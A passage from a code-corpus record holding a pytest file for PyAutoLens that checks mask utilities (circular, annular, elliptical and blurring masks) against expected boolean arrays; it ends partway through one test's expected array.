| 23.333333 | 35 | 0.828571 | 10 | 70 | 5.6 | 0.6 | 0.464286 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 70 | 2 | 36 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a37e9b3240251d612f903962dcba6516aaaef371 | 71,395 | py | Python | test/data/array/util/test_mask_util.py | AshKelly/PyAutoLens | 043795966338a655339e61782253ad67cc3c14e6 | [
"MIT"
] | null | null | null | test/data/array/util/test_mask_util.py | AshKelly/PyAutoLens | 043795966338a655339e61782253ad67cc3c14e6 | [
"MIT"
] | null | null | null | test/data/array/util/test_mask_util.py | AshKelly/PyAutoLens | 043795966338a655339e61782253ad67cc3c14e6 | [
"MIT"
] | null | null | null | import os
import numpy as np
import pytest
from autolens import exc
from autolens.data.array import mask
from autolens.data.array.util import mask_util
test_data_dir = "{}/../test_files/array/".format(os.path.dirname(os.path.realpath(__file__)))
class TestTotalPixels:
def test__total_image_pixels_from_mask(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True]])
assert mask_util.total_regular_pixels_from_mask(mask) == 5
def test__total_sub_pixels_from_mask(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True]])
assert mask_util.total_sub_pixels_from_mask_and_sub_grid_size(mask, sub_grid_size=2) == 20
def test__total_edge_pixels_from_mask(self):
mask = np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]])
assert mask_util.total_edge_pixels_from_mask(mask) == 8
class TestTotalSparsePixels:
def test__mask_full_false__full_pixelization_grid_pixels_in_mask(self):
ma = mask.Mask(array=np.array([[False, False, False],
[False, False, False],
[False, False, False]]), pixel_scale=1.0)
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,0]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 4
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,0], [1 ,1], [2 ,1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 6
def test__mask_is_cross__only_pixelization_grid_pixels_in_mask_are_counted(self):
ma = mask.Mask(array=np.array([[True, False, True],
[False, False, False],
[True, False, True]]), pixel_scale=1.0)
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,0]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 2
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,0], [1 ,1], [2 ,1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 4
def test__same_as_above_but_3x4_mask(self):
ma = mask.Mask(array=np.array([[True, True, False, True],
[False, False, False, False],
[True, True, False, True]]), pixel_scale=1.0)
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,0]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 2
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,0], [1 ,1], [1 ,2], [1 ,3], [2 ,2]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 6
def test__same_as_above_but_4x3_mask(self):
ma = mask.Mask(array=np.array([[True, False, True],
[True, False, True],
[False, False, False],
[True, False, True]]), pixel_scale=1.0)
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 2
full_pix_grid_pixel_centres = np.array([[0 ,0], [0 ,1], [0 ,2], [1 ,1], [2 ,0], [2 ,1], [2 ,2], [3 ,1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 6
class TestMaskCircular(object):
def test__3x3_mask_input_radius_small__medium__big__masks(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
radius_arcsec=0.5)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
radius_arcsec=1.3)
assert (mask == np.array([[True, False, True],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
radius_arcsec=3.0)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, False]])).all()
def test__4x3_mask_input_radius_small__medium__big__masks(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
radius_arcsec=0.5)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
radius_arcsec=1.5001)
assert (mask == np.array([[True, False, True],
[False, False, False],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
radius_arcsec=3.0)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, False],
[False, False, False]])).all()
def test__4x4_mask_input_radius_small__medium__big__masks(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
radius_arcsec=0.72)
assert (mask == np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
radius_arcsec=1.7)
assert (mask == np.array([[True, False, False, True],
[False, False, False, False],
[False, False, False, False],
[True, False, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
radius_arcsec=3.0)
assert (mask == np.array([[False, False, False, False],
[False, False, False, False],
[False, False, False, False],
[False, False, False, False]])).all()
def test__origin_shifts__downwards__right__diagonal(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
radius_arcsec=0.5, centre=(-3, 0))
assert mask.shape == (3, 3)
assert (mask == np.array([[True, True, True],
[True, True, True],
[True, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
radius_arcsec=0.5, centre=(0.0, 3.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[True, True, True],
[True, True, False],
[True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
radius_arcsec=0.5, centre=(3, 3))
assert (mask == np.array([[True, True, False],
[True, True, True],
[True, True, True]])).all()
class TestMaskAnnular(object):
def test__mask_inner_radius_zero_outer_radius_small_medium_and_large__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=1.0,
inner_radius_arcsec=0.0, outer_radius_arcsec=0.5)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 4), pixel_scale=1.0,
inner_radius_arcsec=0.81, outer_radius_arcsec=2.0)
assert (mask == np.array([[True, False, False, True],
[False, True, True, False],
[False, True, True, False],
[True, False, False, True]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=3.0)
assert (mask == np.array([[False, False, False],
[False, True, False],
[False, False, False]])).all()
def test__4x3_mask_inner_radius_small_outer_radius_medium__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 3), pixel_scale=1.0,
inner_radius_arcsec=0.51, outer_radius_arcsec=1.51)
assert (mask == np.array([[True, False, True],
[False, True, False],
[False, True, False],
[True, False, True]])).all()
def test__4x3_mask_inner_radius_medium_outer_radius_large__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 3), pixel_scale=1.0,
inner_radius_arcsec=1.51, outer_radius_arcsec=3.0)
assert (mask == np.array([[False, True, False],
[True, True, True],
[True, True, True],
[False, True, False]])).all()
def test__4x4_mask_inner_radius_medium_outer_radius_large__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 4), pixel_scale=1.0,
inner_radius_arcsec=1.71, outer_radius_arcsec=3.0)
assert (mask == np.array([[False, True, True, False],
[True, True, True, True],
[True, True, True, True],
[False, True, True, False]])).all()
def test__origin_shift__simple_shift_upwards__right_diagonal(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=3.0,
inner_radius_arcsec=0.5,
outer_radius_arcsec=9.0, centre=(3.0, 0.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[False, True, False],
[False, False, False],
[False, False, False]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=3.0,
inner_radius_arcsec=0.5,
outer_radius_arcsec=9.0, centre=(0.0, 3.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[False, False, False],
[False, False, True],
[False, False, False]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=3.0,
inner_radius_arcsec=0.5,
outer_radius_arcsec=9.0, centre=(-3.0, 3.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, True]])).all()
class TestMaskAntiAnnular(object):
def test__5x5_mask_inner_radius_includes_central_pixel__outer_extended_beyond_radius(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(5, 5), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=10.0,
outer_radius_2_arcsec=20.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, True, True, True]])).all()
def test__5x5_mask_inner_radius_includes_3x3_central_pixels__outer_extended_beyond_radius(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(5, 5), pixel_scale=1.0,
inner_radius_arcsec=1.5, outer_radius_arcsec=10.0,
outer_radius_2_arcsec=20.0)
assert (mask == np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]])).all()
def test__5x5_mask_inner_radius_includes_central_pixel__outer_radius_includes_outer_pixels(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(5, 5), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=1.5,
outer_radius_2_arcsec=20.0)
assert (mask == np.array([[False, False, False, False, False],
[False, True, True, True, False],
[False, True, False, True, False],
[False, True, True, True, False],
[False, False, False, False, False]])).all()
def test__7x7_second_outer_radius_mask_works_too(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(7, 7), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=1.5,
outer_radius_2_arcsec=2.9)
assert (mask == np.array([[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, True, True, True, False, True],
[True, False, True, False, True, False, True],
[True, False, True, True, True, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True]])).all()
def test__origin_shift__diagonal_shift(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(7, 7), pixel_scale=3.0,
inner_radius_arcsec=1.5, outer_radius_arcsec=4.5,
outer_radius_2_arcsec=8.7, centre=(-3.0, 3.0))
assert (mask == np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, False, False],
[True, True, False, True, True, True, False],
[True, True, False, True, False, True, False],
[True, True, False, True, True, True, False],
[True, True, False, False, False, False, False]])).all()
class TestMaskElliptical(object):
def test__input_circular_params__small_medium_and_large_masks(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=0.5, axis_ratio=1.0, phi=0.0)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=1.0, phi=0.0)
assert (mask == np.array([[True, False, True],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=3.0, axis_ratio=1.0, phi=0.0)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, False]])).all()
def test__input_ellipticl_params__reduce_axis_ratio_makes_side_mask_values_false(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=0.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=180.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=360.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
def test__same_as_above_but_90_degree_rotations(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=90.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=270.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True]])).all()
def test__same_as_above_but_diagonal_rotations(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1, phi=45.0)
assert (mask == np.array([[True, True, False],
[True, False, True],
[False, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1,
phi=135.0)
assert (mask == np.array([[False, True, True],
[True, False, True],
[True, True, False]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1,
phi=225.0)
assert (mask == np.array([[True, True, False],
[True, False, True],
[False, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1,
phi=315.0)
assert (mask == np.array([[False, True, True],
[True, False, True],
[True, True, False]])).all()
def test__4x3__ellipse_is_formed(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.9, phi=90.0)
assert (mask == np.array([[True, False, True],
[False, False, False],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.1, phi=270.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True],
[True, False, True]])).all()
def test__3x4__ellipse_is_formed(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 4), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.9, phi=0.0)
assert (mask == np.array([[True, False, False, True],
[False, False, False, False],
[True, False, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 4), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.1, phi=180.0)
assert (mask == np.array([[True, True, True, True],
[False, False, False, False],
[True, True, True, True]])).all()
def test__3x3_mask__shifts_dowwards__right__diagonal(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
major_axis_radius_arcsec=4.8, axis_ratio=0.1, phi=45.0, centre=(-3.0, 0.0))
assert (mask == np.array([[True, True, True],
[True, True, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
major_axis_radius_arcsec=4.8, axis_ratio=0.1, phi=45.0, centre=(0.0, 3.0))
assert (mask == np.array([[True, True, True],
[True, True, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
major_axis_radius_arcsec=4.8, axis_ratio=0.1, phi=45.0, centre=(-3.0, 3.0))
assert (mask == np.array([[True, True, True],
[True, True, True],
[True, True, False]])).all()
class TestMaskEllipticalAnnular(object):
def test__mask_inner_radius_zero_outer_radius_small_medium_and_large__mask__all_circular_parameters(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3,3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=0.5, outer_axis_ratio=1.0, outer_phi=0.0)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.81, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=1.0, outer_phi=0.0)
assert (mask == np.array([[True, False, False, True],
[False, True, True, False],
[False, True, True, False],
[True, False, False, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.5, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=3.0, outer_axis_ratio=1.0, outer_phi=0.0)
assert (mask == np.array([[False, False, False],
[False, True, False],
[False, False, False]])).all()
def test__elliptical_parameters_and_rotations_work_correctly(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3,3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=0.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=45.0)
assert (mask == np.array([[True, True, False],
[True, False, True],
[False, True, True]])).all()
def test__large_mask_array__can_see_elliptical_annuli_form(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.5, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, False, True, False, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=2.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.5, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.8, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, False, False, False, True],
[True, False, True, False, True],
[True, False, False, False, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
def test__shifts(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0,
centre=(-1.0, 0.0))
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0,
centre=(0.0, 1.0))
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True],
[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True],
[True, True, True, True, True],])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0,
centre=(-1.0, 1.0))
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True],
[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True]])).all()
class TestMaskBlurring(object):
def test__size__3x3_small_mask(self):
mask = np.array([[True, True, True],
[True, False, True],
[True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False],
[False, True, False],
[False, False, False]])).all()
def test__size__3x3__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, True, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])).all()
def test__size__5x5__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
assert (blurring_mask == np.array([[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, True, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True]])).all()
def test__size__5x3__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 3))
assert (blurring_mask == np.rot90(np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, False, True, False, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]]))).all()
def test__size__3x5__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 5))
assert (blurring_mask == np.rot90(np.array([[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, True, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True]]))).all()
def test__size__3x3__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False],
[False, True, False, True, False, True, False],
[False, False, False, True, False, False, False],
[True, True, True, True, True, True, True],
[False, False, False, True, False, False, False],
[False, True, False, True, False, True, False],
[False, False, False, True, False, False, False]])).all()
def test__size__5x5__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
assert (blurring_mask == np.array([[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False,
False]])).all()
def test__size__5x3__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 3))
assert (blurring_mask == np.rot90(np.array([[True, True, True, True, True, True, True, True, True],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[True, True, True, True, True, True, True, True, True],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
